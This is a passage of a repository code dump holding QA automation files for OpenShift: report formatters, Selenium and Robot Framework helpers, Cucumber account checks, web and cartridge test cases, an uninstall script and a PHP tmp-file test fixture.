padding-top: 10px;\n margin-bottom: 0;\n}\nh2 {\n font-size:\t115%;\n text-decoration: underline;\n padding: 0;\n padding-bottom: 10px;\n margin-bottom: 0;\n margin-left: .5in;\n}\nh3, h4, h5 {\n font-size: 1.0em;\n}\np {\n margin: 0;\n padding: 0;\n margin-left: .5in;\n font-family: monospace;\n}\n\nspan.passed {\n color: green;\n font-weight: bold;\n}\nspan.failed {\n color: red;\n font-weight: bold;\n}\nspan.completed {\n color: green;\n font-weight: bold;\n}\nspan.incomplete {\n color: yellow;\n}\nspan.aborted {\n color: yellow;\n}\nspan.diagnostic {\n}\nspan.error {\n color: red;\n font-weight: bold;\n}\nspan.info {\n}\n\n </style>\n </head>\n <body>\n\"\"\"\n\n\tdef finalize(self):\n\t\treturn \"\\n </body>\\n</html>\\n\"\n\n\tdef page(self):\n\t\treturn \"<br><hr><br>\\n\"\n\n\tdef title(self, title):\n\t\ts = [\"<h1>\"]\n\t\ts.append(escape(title))\n\t\ts.append(\"</h1>\\n\")\n\t\treturn \"\".join(s)\n\n\tdef heading(self, text, level=1):\n\t\ts = []\n\t\ts.append(\"\\n<h%s>\" % (level,))\n\t\ts.append(escape(text))\n\t\ts.append(\"</h%s>\\n\" % (level,))\n\t\treturn \"\".join(s)\n\n\tdef paragraph(self, text):\n\t\treturn \"<p>%s</p>\\n\" % (escape(text),)\n\n\tdef message(self, msgtype, msg, level=1):\n\t\tmsg = str(msg)\n\t\tmsgtype = self._MSGTYPESUB.get(msgtype, msgtype)\n\t\tif msg.find('\\n') > 0:\n if msgtype.find('ERROR') > 0:\n return \"<p><span class=\\\"error\\\">%s:\\n<code>%s</code>\\n</span></p>\" % (msgtype, \\\n msg.replace('\\n', '<br/>'))\n else:\n return \"<p>%s:\\n<code>%s</code>\\n</p>\" % (msgtype, \\\n msg.replace('\\n', '<br/>'))\n \n\t\telse:\n if msgtype.find('ERROR') > 0:\n return \"<p><span class=\\\"error\\\">%s: %s</span></p>\\n\" % (msgtype, escape(msg))\n\n else:\n return '<p>%s: %s</p>\\n' % (msgtype, escape(msg))\n\n\tdef text(self, text):\n\t\treturn \"<pre>%s</pre>\\n\" % (text,)\n\n\tdef url(self, text, url):\n\t\treturn '<p>%s: <a href=\"%s\">%s</a></p>\\n' % (text, url, url)\n\n\tdef summary(self, text):\n\t\tsum = \"<pre>%s</pre>\\n\" % (text,)\n\t\tsum = sum.replace(\"PASSED\", self._MSGTYPESUB[\"PASSED\"])\n\t\tsum = sum.replace(\"FAILED\", self._MSGTYPESUB[\"FAILED\"])\n\t\treturn sum\n\tdef section(self):\n\t\treturn \"<hr>\\n\"\n\n\n\nif __name__ == \"__main__\":\n\treport = reports.get_report((None, \"-\", \"text/html\",))\n\treport.initialize()\n\treport.info(\"Some self test info.\")\n\treport.passed(\"yippee!\")\n report.error(\"ERROR\\n2nd line\\n\")\n\treport.finalize()\n\n# End of file\n" }, { "alpha_fraction": 0.6629213690757751, "alphanum_fraction": 0.6741573214530945, "avg_line_length": 21.885713577270508, "blob_id": "3faa68849114e53ca0921c225673796acc5a3cba", "content_id": "90e1ad52ebaee34940d613185632db056652d843", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 801, "license_type": "no_license", "max_line_length": 64, "num_lines": 35, "path": "/automation/seleniumjsexe/seleniumjsexe.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\nPROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))\ntesturl = 'file://' + PROJECT_ROOT + '/test.html'\n\ndriver = webdriver.Firefox()\ndriver.get(testurl)\n\njs1 = '''\nvar title = document.title;\nalert(\"The page of title is: \" + title);\n'''\njs2 = '''\n$(\"#m1\").show(\"slow\");\n'''\njq_path = 'jquery183.js'\njq_file = open(jq_path)\njq = jq_file.read()\njq_file.close()\n\n# ===== using 
native js =====\n#title = driver.execute_script(js1)\n\n# ===== using jquery =====\n#driver.execute_script(jq)\n#driver.execute_script(js2)\n\n# ===== handle mouseover using selenium api =====\n#hover_element = driver.find_element_by_id(\"l1\")\n#hover = ActionChains(driver).move_to_element(hover_element)\n#hover.perform()\n" }, { "alpha_fraction": 0.5583863854408264, "alphanum_fraction": 0.5605095624923706, "avg_line_length": 30.399999618530273, "blob_id": "82955ac729c8ed21a88d7fc022c8a4711c9c2861", "content_id": "783feef4386e21437e29be160b35bc0a936dcff8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 68, "num_lines": 15, "path": "/automation/listenertest/PleaseWaitWithArg.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import tkMessageBox\nfrom Tkinter import Tk\n \n \nclass PleaseWaitWithArg():\n ROBOT_LISTENER_API_VERSION = 2\n \n def __init__(self, test_name = ''):\n self.test_name = test_name\n \n def start_test(self, name, attributes):\n if (name == self.test_name) or ('' == self.test_name):\n Tk().withdraw() # Remove root window\n tkMessageBox.showinfo(\"Please click 'OK'...\",\n \"About to start test '%s'\" % name)\n" }, { "alpha_fraction": 0.6265060305595398, "alphanum_fraction": 0.651462972164154, "avg_line_length": 21.764705657958984, "blob_id": "a8590045d4e1752f850339657eddbf070a48481d", "content_id": "7faeeb30ccfc13eecb04d2c3796ab282ef26a03e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1162, "license_type": "no_license", "max_line_length": 68, "num_lines": 51, "path": "/automation/open/lib/reports/ANSI.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nA standard formatter enhanced to support ANSI terminal color output.\n\n\"\"\"\n\nimport reports\n\nRESET = \"\\x1b[0m\"\nRED = \"\\x1b[31;01m\"\nYELLOW = \"\\x1b[33;01m\"\nGREEN = \"\\x1b[32;01m\"\nBLUE = \"\\x1b[34;01m\"\nWHITE = \"\\x1b[01m\"\n\n\nclass ANSIFormatter(reports.StandardFormatter):\n\tMIMETYPE = \"text/ansi\"\n\t_TRANSLATE = {\n\t\t\"PASSED\":GREEN+'PASSED'+RESET,\n\t\t\"FAILED\":RED+'FAILED'+RESET,\n\t\t\"ABORTED\":YELLOW+'ABORTED'+RESET,\n\t\t\"INCOMPLETE\":YELLOW+'INCOMPLETE'+RESET,\n\t\t\"ABORT\":YELLOW+'ABORT'+RESET,\n\t\t\"INFO\":\"INFO\",\n\t\t\"DIAGNOSTIC\":WHITE+'DIAGNOSTIC'+RESET,\n\t}\n\n\tdef message(self, msgtype, msg, level=1):\n\t\tmsgtype = self._TRANSLATE.get(msgtype, msgtype)\n\t\treturn \"%s%s: %s\\n\" % (\" \"*(level-1), msgtype, msg)\n\n\tdef summary(self, text):\n\t\ttext = text.replace(\"PASSED\", self._TRANSLATE[\"PASSED\"])\n\t\ttext = text.replace(\"FAILED\", self._TRANSLATE[\"FAILED\"])\n\t\ttext = text.replace(\"INCOMPLETE\", self._TRANSLATE[\"INCOMPLETE\"])\n\t\ttext = text.replace(\"ABORTED\", self._TRANSLATE[\"ABORTED\"])\n\t\treturn text\n\n\ndef _test(argv):\n\tpass # XXX\n\nif __name__ == \"__main__\":\n\timport sys\n\t_test(sys.argv)\n\n" }, { "alpha_fraction": 0.567549467086792, "alphanum_fraction": 0.5853167772293091, "avg_line_length": 28.534652709960938, "blob_id": "0f069a5b28a13143edfed5c74f4d6100166a4a4c", "content_id": "9eaae09e2ee6fb63dc9fd0cca745d53f3326b01c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 5966, "license_type": "no_license", "max_line_length": 99, 
"num_lines": 202, "path": "/automation/open/testmodules/RT/cucumber/step_definitions/node_steps.rb", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# \n# \n# Steps that can be used to check applications installed on a server (node)\n#\n#require 'etc'\n\nrequire 'openshift'\nrequire 'resolv'\ninclude OpenShift\n\n# Controller cartridge command paths\n$cartridge_root = '/usr/libexec/li/cartridges'\n$controller_config_path = \"cdk-app-create\"\n$controller_config_format = \"#{$controller_config_path} -c '%s'\"\n$controller_deconfig_path = \"cdk-app-destroy\"\n$controller_deconfig_format = \"#{$controller_deconfig_path} -c '%s'\"\n$home_root = \"/var/lib/libra\"\n# --------------------------------------------------------------------------\n# Account Checks\n# --------------------------------------------------------------------------\n# These must run after server_steps.rb: I create a <name> app for <framework>\n\n# These depend on test data of this form:\n# And the following test data\n# | accountname \n# | 00112233445566778899aabbccdde000\n\n\n# Convert a unix UID to a hex string suitable for use as a tc(1m) class value\ndef netclass uid\n \"%04x\" % uid\nend\n\n# copied from server-common/openshift/user.rb 20110630\ndef gen_small_uuid()\n # Put config option for rhlogin here so we can ignore uuid for dev environments\n %x[/usr/bin/uuidgen].gsub('-', '').strip\nend\n\nGiven /^a new guest account$/ do\n # generate a random account name and use the stock SSH keys\n # generate a random UUID and use the stock keys\n acctname = gen_small_uuid\n @account = {\n 'accountname' => acctname,\n }\n command = $controller_config_format % [acctname]\n puts \"******\", command\n run command\n puts \"&&&&&&\", command\n # get and store the account UID's by name\n @account['uid'] = Etc.getpwnam(acctname).uid\nend\n\nGiven /^the guest account has no application installed$/ do\n # Assume this is true\nend\n\nWhen /^I create a guest account$/ do\n # call /usr/libexec/li/cartridges @table.hashes.each do |row|\n # generate a random account name and use the stock SSH keys\n # generate a random UUID and use the stock keys\n acctname = gen_small_uuid\n @account = {\n 'accountname' => acctname,\n }\n command = $controller_config_format % [acctname]\n run command\n # get and store the account UID's by name\n @account['uid'] = Etc.getpwnam(acctname).uid\nend\n\nWhen /^I delete the guest account$/ do\n # call /usr/libexec/li/cartridges @table.hashes.each do |row|\n \n command = $controller_deconfig_format % [@account['accountname']]\n run command\nend\n\nWhen /^I create a new namespace$/ do\n ec = run(\"#{$rhc_domain_script} create -n vuvuzuzufukuns -l vuvuzuzufuku -p fakepw -d\")\nend\n\nWhen /^I delete the namespace$/ do\n ec = run(\"#{$rhc_domain_script} destroy -n vuvuzuzufukuns -l vuvuzuzufuku -p fakepw -d\")\n # FIXME: Need to fix this test to work w/ mongo -- need unique name per run.\n #ec.should be == 0\nend\n\nThen /^a namespace should get deleted$/ do\n ec = run(\"host vuvuzuzufukuns.dev.rhcloud.com | grep \\\"not found\\\"\")\n #ec.should be == 0\nend\n\nThen /^an account password entry should( not)? exist$/ do |negate|\n # use @app['uuid'] for account name\n \n begin\n @pwent = Etc.getpwnam @account['accountname']\n rescue\n nil\n end\n\n if negate\n @pwent.should be_nil \n else\n @pwent.should_not be_nil\n end\nend\n\nThen /^an account PAM limits file should( not)? exist$/ do |negate|\n limits_dir = '/etc/security/limits.d'\n @pamfile = File.exists? 
\"#{limits_dir}/84-#{@account['accountname']}.conf\"\n\n if negate\n @pamfile.should_not be_true\n else\n @pamfile.should be_true\n end\nend\n\nThen /^an HTTP proxy config file should( not)? exist$/ do |negate|\n\nend\n\nThen /^an account cgroup directory should( not)? exist$/ do |negate|\n cgroups_dir = '/cgroup/all/libra'\n @cgdir = File.directory? \"#{cgroups_dir}/#{@account['accountname']}\"\n\n if negate\n @cgdir.should_not be_true\n else\n @cgdir.should be_true\n end\nend\n\nThen /^an account home directory should( not)? exist$/ do |negate|\n @homedir = File.directory? \"#{$home_root}/#{@account['accountname']}\"\n \n if negate\n @homedir.should_not be_true\n else\n @homedir.should be_true\n end\nend\n\nThen /^selinux labels on the account home directory should be correct$/ do\n homedir = \"#{$home_root}/#{@account['accountname']}\"\n @result = `restorecon -v -n #{homedir}`\n @result.should be == \"\" \nend\n\nThen /^disk quotas on the account home directory should be correct$/ do\n\n # EXAMPLE\n\n # no such user\n # quota: user 00112233445566778899aabbccdde001 does not exist.\n\n # no quotas on user\n # Disk quotas for user root (uid 0): none\n\n # Disk quotas for user 00112233445566778899aabbccdde000 (uid 501): \n # Filesystem blocks quota limit grace files quota limit grace\n # /dev/xvde 24 0 131072 7 0 10000 \n\n\n @result = `quota -u #{@account['accountname']}`\n \n @result.should_not match /does not exist./\n @result.should_not match /: none\\s*\\n?/\n @result.should match /Filesystem blocks quota limit grace files quota limit grace/\nend\n\n\nThen /^a traffic control entry should( not)? exist$/ do |negate|\n acctname = @account['accountname']\n tc_format = 'tc -s class show dev eth0 classid 1:%s'\n tc_command = tc_format % (netclass @account['uid'])\n @result = `#{tc_command}`\n if negate\n @result.should be == \"\"\n else\n @result.should_not be == \"\"\n end\nend\n\n# ===========================================================================\n# Generic App Checks\n# ===========================================================================\n\n# ===========================================================================\n# PHP App Checks\n# ===========================================================================\n\n# ===========================================================================\n# WSGI App Checks\n# ===========================================================================\n\n# ===========================================================================\n# Rack App Checks\n# ===========================================================================\n" }, { "alpha_fraction": 0.5584919452667236, "alphanum_fraction": 0.5690260529518127, "avg_line_length": 41.265625, "blob_id": "5ae920a3a4899f6714cd49c3005f852e78221804", "content_id": "7bfe39a9e57440d6f18b899be55bc7c0185c412f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5411, "license_type": "no_license", "max_line_length": 284, "num_lines": 128, "path": "/automation/open/testmodules/RT/cartridge/embed_jenkins2scalable_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: embed_jenkins2scalable_app.py\n# Date: 2012/04/05 17:00\n# Author: [email protected]\n#\n\nimport sys\nimport os\nimport time\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[US2091][Runtime][rhc-cartridge]Embed jenkins client to scalable 
app\"\n self.app_name = common.getRandomString(10)\n self.app_type = 'php'\n tcms_testcase_id = 145122\n self.steps=[]\n\n common.env_setup()\n\n def finalize(self):\n #os.system(\"rm -rf server; rhc-ctl-app -a %s -c destroy -b -l %s -p %s; rhc-ctl-app -a server -c destroy -b -l %s -p %s;\"%(self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd))\n pass\n\nclass EmbedJenkins2scalableApp(OpenShiftTest):\n def test_method(self):\n\n def verify(app_name, what):\n url = OSConf.get_app_url(app_name) \n (status, output) = common.grep_web_page(url, what)\n return status\n\n self.steps.append(testcase.TestCaseStep(\"1. Create an scalable app using REST API\",\n common.create_scalable_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"2. Scale up.\",\n common.scale_up,\n function_parameters=[self.app_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"3. Create a jenkins server app.\",\n common.create_app,\n function_parameters=['server', common.app_types['jenkins'], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"4. Embed a jenkins client to scalable app.\",\n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types[\"jenkins\"]],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"5. Make some changes to the app.\",\n '''cd %s && echo \"<html><body><?php echo 'App DNS: '.$_ENV['OPENSHIFT_GEAR_DNS'] . '<br />';?> </body> </html>\" >php/index.php && git commit -m \"x\" -a && git push'''%self.app_name,\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"6. Scale up.\",\n common.scale_up,\n function_parameters=[self.app_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"7. Scale down.\",\n common.scale_down,\n function_parameters = [self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"8. Remove Jenkins client\",\n common.embed,\n function_parameters = [self.app_name, \"remove-\" + common.cartridge_types[\"jenkins\"]],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"9. Make some changes to the app.\",\n '''cd %s && echo \"<html><body><?php echo 'App DNS: '.$_ENV['OPENSHIFT_GEAR_DNS'] . '<br />';?> second chance...</body> </html>\" >php/index.php && git commit -m \"x\" -a && git push'''%self.app_name,\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"10. Embed a jenkins client to scalable app.\",\n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types[\"jenkins\"]],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"11. Make some changes to the app.\",\n '''cd %s && echo \"<html><body><?php echo 'App DNS: '.$_ENV['OPENSHIFT_GEAR_DNS'] . '<br />';?> third chance...</body> </html>\" >php/index.php && git commit -m \"x\" -a && git push'''%self.app_name,\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\"12. 
Make some changes to the app.\",\n verify,\n function_parameters = [self.app_name, 'third'],\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps)\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EmbedJenkins2scalableApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of embed_jenkins2scalable_app.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.644444465637207, "alphanum_fraction": 0.6888889074325562, "avg_line_length": 43.66666793823242, "blob_id": "6c91a3823feac0e064ddec1ba31bba7c095b6c2b", "content_id": "88c18f421d957b56d3ec05cb561bd82e24eafdcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 135, "license_type": "no_license", "max_line_length": 64, "num_lines": 3, "path": "/python-simple-cmd/uninstall.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "sudo rm -rf /usr/lib/python2.7/site-packages/scmd-0.1-py2.7.egg/\nsudo rm -rf /usr/bin/scmd \nsudo rm -rf ./build/ dist/ scmd.egg-info/\n\n" }, { "alpha_fraction": 0.4911894202232361, "alphanum_fraction": 0.5539647340774536, "avg_line_length": 23.54054069519043, "blob_id": "49e0323957489406bf35592d015ee1c37dd80d6c", "content_id": "ac41a1d5561bf9e5c18dd620edb9e3caaa9570f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 908, "license_type": "no_license", "max_line_length": 75, "num_lines": 37, "path": "/automation/open/testmodules/RT/security/data/delete_old_files_from_tmp_devenv.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\necho \"Welcome~~~~~~~\\n\";\necho \"###Test Case###: Security - Delete old files from tmp\\n\";\nif(!empty($_GET[\"action\"])) {\n $command1 = \"touch -t 1001010101 /tmp/tmp_old 2>&1\";\n echo \"Command 1: \".$command1.\"\\n\";\n passthru($command1, $ret1);\n\n $command2 = \"touch -t 1001010101 /var/tmp/var_tmp_old 2>&1\";\n echo \"Command 2: \".$command2.\"\\n\";\n passthru($command2, $ret2);\n\n $command = \"ls -l /tmp 2>&1\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n\n if($ret1 == 0 && $ret2 == 0){\n echo \"RESULT=0\\n\";\n } else {\n echo \"RESULT=1\\n\";\n }\n} else {\n $command1 = \"ls -l /tmp/tmp_old 2>&1 || ls -l /var/tmp/var_tmp_old 2>&1\";\n echo \"Command 1: \".$command1.\"\\n\";\n passthru($command1, $ret1); \n\n $command = \"ls -l /tmp 2>&1\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n\n if($ret1 == 0){\n echo \"RESULT=0\\n\";\n } else {\n echo \"RESULT=1\\n\";\n }\n}\n?>\n" }, { "alpha_fraction": 0.5378743410110474, "alphanum_fraction": 0.5564689636230469, "avg_line_length": 34.47222137451172, "blob_id": "e92441bf2b15730c99b8c6f0e8f7cfe91e768d7b", "content_id": "75b9d87c06c5baac7b93aebb9107358c7675be00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5109, "license_type": "no_license", "max_line_length": 101, "num_lines": 144, "path": "/automation/open/testmodules/UI/web/case_141708.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_141707.py\n# Date: 
2012/07/04 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckCommunityLink(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.go_to_community()\n time.sleep(5)\n \n #Assert all the links of Community page.\n web.assert_text_equal_by_xpath('Overview',\n '''//div[@id='block-menu_block-1']/div/div/ul/li/a''')\n web.assert_text_equal_by_xpath('Blog',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[2]/a''')\n web.assert_text_equal_by_xpath('Forum',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[3]/a''')\n web.assert_text_equal_by_xpath('Vote on Features',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[4]/a''')\n web.assert_text_equal_by_xpath('Get Involved',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[5]/a''')\n web.assert_text_equal_by_xpath('Open Source',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[5]/ul/li/a''')\n web.assert_text_equal_by_xpath('Get the Bits',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[5]/ul/li[2]/a''')\n web.assert_text_equal_by_xpath('Events',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[6]/a''')\n web.assert_text_equal_by_xpath('Videos',\n '''//div[@id='block-menu_block-1']/div/div/ul/li[7]/a''')\n \n \n \n #Check all the links of Community page.\n #Overview\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Welcome to OpenShift',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Overview link is broken')\n\n #Blog\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[2]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Blogs',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Blog link is broken')\n\n #Forum\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[3]/a''')\n web.assert_text_equal_by_xpath('Forums',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Forum link is broken')\n\n #Vote on Features\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[4]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Vote on Features',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Vote on Features link is broken')\n\n #Get Involved\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[5]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Get Involved',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Get Involved link is broken')\n\n #Open Source\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[5]/ul/li/a''')\n time.sleep(5)\n web.assert_text_equal_by_xpath('OpenShift is Open Source',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Open Source link is broken')\n\n #Get the Bits\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[5]/ul/li[2]/a''')\n time.sleep(5)\n web.assert_text_equal_by_xpath('OpenShift Origin Source Code',\n '''//div[@id='content']/div/div/div/div/div/h1''',\n 'Get the bits link is broken')\n\n #Events\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[6]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('Events',\n 
'''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Events link is broken')\n \n #Videos\n web.go_to_community()\n web.click_element_by_xpath('''//div[@id='block-menu_block-1']/div/div/ul/li[7]/a''')\n time.sleep(5)\n web.assert_text_equal_by_xpath('Videos',\n '''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\n 'Videos link is broken')\n\n self.tearDown()\n\n return self.passed(\"Case 141708 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckCommunityLink)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_141708.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5913897156715393, "alphanum_fraction": 0.6231117844581604, "avg_line_length": 21.049999237060547, "blob_id": "4a4e8c47d07a155de80cd159db6f01ea72878727", "content_id": "cf695b87560bfb6273608c24d2b037d2736128a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1324, "license_type": "no_license", "max_line_length": 113, "num_lines": 60, "path": "/automation/open/testmodules/UI/web/case_122359.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122359.py\n# Date: 2012/08/06 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Create_delete_python_app(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Create python application\n web.create_app(\"python-2.6\", \"python2\")\n time.sleep(10) \n web.click_element_by_link_text('''My Applications''')\n time.sleep(2)\n web.click_element_by_link_text('''http://python2-'''+web.domain+'''.'''+web.platform+'''.rhcloud.com/''')\n time.sleep(5)\n web.check_title(\"Welcome to OpenShift\")\n web.delete_last_app(\"python2\")\n\n self.tearDown()\n\n return self.passed(\"Case 122359 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Create_delete_python_app)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_122359.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6045933961868286, "alphanum_fraction": 0.6170080900192261, "avg_line_length": 34.010868072509766, "blob_id": "3bf8ac4135e7d92950bd42706650d8784b3e9f95", "content_id": "c584b97346b60a25a087b1a6b05d1e993f6ac29c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3222, "license_type": "no_license", "max_line_length": 162, "num_lines": 92, "path": "/automation/open/testmodules/RT/cartridge/cdi_application_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US504][rhc-cartridge]JBoss cartridge: CDI application support\nhttps://tcms.engineering.redhat.com/case/122406/\n\"\"\"\nimport sys, os, re, time, random\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nWORK_DIR = 
os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US504][rhc-cartridge]JBoss cartridge: CDI application support\"\n\n self.app_name = \"weldguess\"\n self.git_repo = \"./%s\" % self.app_name\n self.app_type = common.app_types[\"jbossas\"]\n tcms_testcase_id=122406\n common.env_setup()\n\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s* \"%(self.app_name))\n\nclass CdiApplicationSupport(OpenShiftTest):\n\n def test_method(self):\n # 1.Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. Create an jbossas app\",\n common.create_app,\n function_parameters=[self.app_name,self.app_type,self.config.OPENSHIFT_user_email,self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Copy weldguess.war to <app_repo>/deployments\n self.steps_list.append(testcase.TestCaseStep(\"2.Copy weldguess.war to /tmp/reponame/deployments\",\n \"cp %s/app_template/weldguess.war %s/deployments && cd %s/deployments && touch weldguess.war.dodeploy\" % (WORK_DIR, self.git_repo, self.git_repo),\n expect_description=\"Copy succeed\",\n expect_return=0))\n\n # 3.Git push all the changes\n self.steps_list.append(testcase.TestCaseStep(\"3.Git push all the changes\",\n \"cd %s && git add . && git commit -am t && git push\" % (self.git_repo),\n expect_description=\"Git push should succeed\",\n expect_return=0))\n\n # 4.Check app via browser\n def get_app_url(app_name):\n def closure():\n return OSConf.get_app_url(app_name) + \"/weldguess/home.jsf\"\n return closure\n\n self.steps_list.append(testcase.TestCaseStep(\"4. Access the app's URL\",\n common.grep_web_page,\n function_parameters=[get_app_url(self.app_name), \"Guess a number\", \"-H 'Pragma: no-cache'\", 3, 6],\n expect_description=\"'Guess a number' should be found in the web page\",\n expect_return=0))\n\n case = 